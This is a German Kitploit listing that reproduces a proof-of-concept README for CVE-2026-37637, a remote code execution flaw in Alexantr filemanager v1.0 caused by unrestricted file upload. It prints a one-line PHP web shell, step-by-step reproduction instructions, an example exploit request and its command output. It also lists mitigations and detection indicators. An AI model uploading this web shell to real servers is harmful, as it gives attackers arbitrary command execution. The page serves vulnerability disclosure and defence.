Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-37637 — Remote-Code-Ausführung in Alexantr filemanager v1.0 durch uneingeschränkten Datei-Upload | Kitploit
Tools/GitHubGitHub/slo-cyber-sec/cve-2026-37637
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubslo-cyber-sec/cve-2026-37637

CVE-2026-37637

Remote-Code-Ausführung in Alexantr filemanager v1.0 durch uneingeschränkten Datei-Upload

Repository anzeigen
1vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-37637

Proof of Concept für CVE-2026-37637 – Remote Code Execution in Alexantr filemanager v1.0 durch uneingeschränkten Datei-Upload in filemanager.php.

Übersicht

CVE-2026-37637 ist eine Remote-Code-Execution-Schwachstelle, die Alexantr filemanager v1.0 betrifft.

Die Schwachstelle existiert in der Komponente filemanager.php aufgrund unzureichender Validierung hochgeladener Dateien. Ein entfernter Angreifer kann eine schädliche PHP-Datei in ein webbasiert zugängliches Verzeichnis hochladen und beliebige Befehle auf dem Server ausführen.

CVE-Status: Bei MITRE eingereicht
Forscher: CYBER-SEC Vendor-Repository: https://github.com/alexantr/filemanager


Schwachstellen-Zusammenfassung

ElementBeschreibung
CVE-IDCVE-2026-37637
SchwachstellentypRemote Code Execution
Betroffenes ProduktAlexantr filemanager
Betroffene Versionv1.0
Verwundbare Komponentefilemanager.php
AngriffsvektorRemote
Authentifizierung erforderlichAbhängig von Bereitstellung/Konfiguration
AuswirkungBeliebige Befehlsausführung
GrundursacheUneingeschränkter Datei-Upload und fehlende serverseitige Dateivalidierung

Auswirkung

Ein Angreifer kann über die Datei-Upload-Funktionalität eine schädliche PHP-Datei hochladen. Da hochgeladene Dateien an einem webbasiert zugänglichen Ort gespeichert werden und die PHP-Ausführung erlaubt ist, kann der Angreifer beliebige Systembefehle auf dem Server ausführen.

Eine erfolgreiche Ausnutzung kann einem Angreifer Folgendes ermöglichen:

  • Beliebige Befehle auf dem Server ausführen
  • Sensible Dateien lesen
  • Anwendungsdateien ändern oder löschen
  • Zusätzliche Malware oder Web-Shells hochladen
  • Weiter in die Hosting-Umgebung vordringen
  • Den betroffenen Server vollständig kompromittieren

Technische Details

Die Anwendung erlaubt Benutzern das Hochladen beliebiger Dateien, ohne die Dateierweiterung, den MIME-Typ oder den Dateiinhalt ordnungsgemäß zu validieren.

Eine schädliche PHP-Datei wie die folgende kann hochgeladen werden:

root@kitploit:~
<?php system($_GET['cmd']); ?>

Sobald sie in ein webbasiert zugängliches Verzeichnis hochgeladen wurde, kann der Angreifer Befehle ausführen, indem er die Datei über den Browser aufruft und Befehle über den Parameter cmd übergibt.

Beispiel:

root@kitploit:~
http://target/uploads/shell.php?cmd=id

Dies führt zur Befehlsausführung auf dem zugrunde liegenden Betriebssystem.


Schritte zur Reproduktion

1. Die verwundbare Anwendung klonen

root@kitploit:~
git clone https://github.com/alexantr/filemanager
cd filemanager

2. Den PHP-Entwicklungsserver starten

root@kitploit:~
php -S localhost:8000

3. Auf die Anwendung zugreifen

Öffnen Sie die Anwendung in einem Browser:

root@kitploit:~
http://localhost:8000/filemanager.php

Je nach Bereitstellung oder Konfiguration kann die Anwendung auch über Folgendes erreichbar sein:

root@kitploit:~
http://localhost:8000/pheditor.php

4. Eine schädliche PHP-Datei hochladen

Erstellen Sie eine Datei mit dem Namen shell.php:

root@kitploit:~
<?php system($_GET['cmd']); ?>

Laden Sie die Datei über die Upload-Funktionalität der Anwendung hoch.

5. Einen Befehl ausführen

Nach dem Hochladen der Datei rufen Sie sie direkt über den Browser auf:

root@kitploit:~
http://localhost:8000/uploads/shell.php?cmd=id

Wenn der Exploit erfolgreich ist, führt der Server den Befehl aus und gibt die Ausgabe zurück.

Beispielausgabe:

root@kitploit:~
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Proof of Concept

Schädliche PHP-Payload

root@kitploit:~
<?php system($_GET['cmd']); ?>

Beispielanfrage

root@kitploit:~
GET /uploads/shell.php?cmd=id HTTP/1.1
Host: target
User-Agent: Mozilla/5.0
Connection: close

Erwartetes Ergebnis

Der über den Parameter cmd übergebene Befehl wird auf dem Server ausgeführt.


Grundursache

Die Schwachstelle wird durch unzureichende serverseitige Validierung in der Datei-Upload-Funktionalität verursacht.

Die Anwendung schränkt Folgendes nicht ordnungsgemäß ein:

  • Dateierweiterungen
  • MIME-Typen
  • Dateiinhalt
  • Upload-Ziel
  • Ausführungsberechtigungen innerhalb des Upload-Verzeichnisses

Infolgedessen können ausführbare PHP-Dateien hochgeladen und direkt ausgeführt werden.


Empfohlene Abhilfemaßnahmen

Der Anbieter und die Benutzer sollten die folgenden Schutzmaßnahmen implementieren.

1. Gefährliche Dateierweiterungen blockieren

Das Hochladen ausführbarer Dateitypen wie der folgenden untersagen:

root@kitploit:~
.php, .phtml, .php3, .php4, .php5, .phar

2. Eine Whitelist verwenden

Nur erwartete Dateitypen zulassen, zum Beispiel:

root@kitploit:~
.jpg, .png, .gif, .txt, .pdf

3. MIME-Typ und Dateiinhalt validieren

Sich nicht nur auf den vom Client bereitgestellten Content-Type-Header verlassen.

Die Dateivalidierung sollte serverseitig durchgeführt werden.

4. Hochgeladene Dateien außerhalb des Web-Roots speichern

Hochgeladene Dateien sollten nicht direkt ausführbar oder öffentlich zugänglich sein.

5. PHP-Ausführung in Upload-Verzeichnissen deaktivieren

Für Apache kann dies mit .htaccess erfolgen:

root@kitploit:~
php_flag engine off
RemoveHandler .php .phtml .php3 .php4 .php5 .phar
RemoveType .php .phtml .php3 .php4 .php5 .phar

Für Nginx die PHP-Verarbeitung in Upload-Pfaden verhindern:

root@kitploit:~
location /uploads/ {
    location ~ \.php$ {
        deny all;
    }
}

6. Hochgeladene Dateien umbenennen

Zufällige, vom Server generierte Dateinamen verwenden und benutzerkontrollierte Erweiterungen entfernen.

7. Zugriffskontrolle anwenden

Die Upload-Funktionalität nur auf vertrauenswürdige Benutzer beschränken.


Erkennung

Administratoren können in webbasiert zugänglichen Verzeichnissen nach verdächtigen hochgeladenen PHP-Dateien suchen.

Beispielindikatoren:

root@kitploit:~
shell.php
cmd.php
upload.php
backdoor.php
.php-Dateien innerhalb von Upload-Verzeichnissen

Verdächtige Anfragemuster können Folgendes umfassen:

root@kitploit:~
?cmd=
?exec=
?shell=
?command=

Beispieleintrag im Log:

root@kitploit:~
GET /uploads/shell.php?cmd=id HTTP/1.1

Haftungsausschluss

Dieses Repository wird ausschließlich zu Bildungs- und Verteidigungszwecken im Bereich der Sicherheit bereitgestellt.

Die Informationen und der Proof of Concept sollen Entwicklern, Systemadministratoren und Sicherheitsexperten helfen, die Schwachstelle zu verstehen und zu beheben.

Verwenden Sie diese Informationen nicht, um Systeme ohne ausdrückliche Genehmigung anzugreifen. Unbefugter Zugriff auf Computersysteme ist illegal.

Der Autor ist nicht verantwortlich für jeglichen Missbrauch der in diesem Repository bereitgestellten Informationen.


Referenzen

  • https://github.com/alexantr/filemanager
  • https://cve.mitre.org/
Tool herunterladen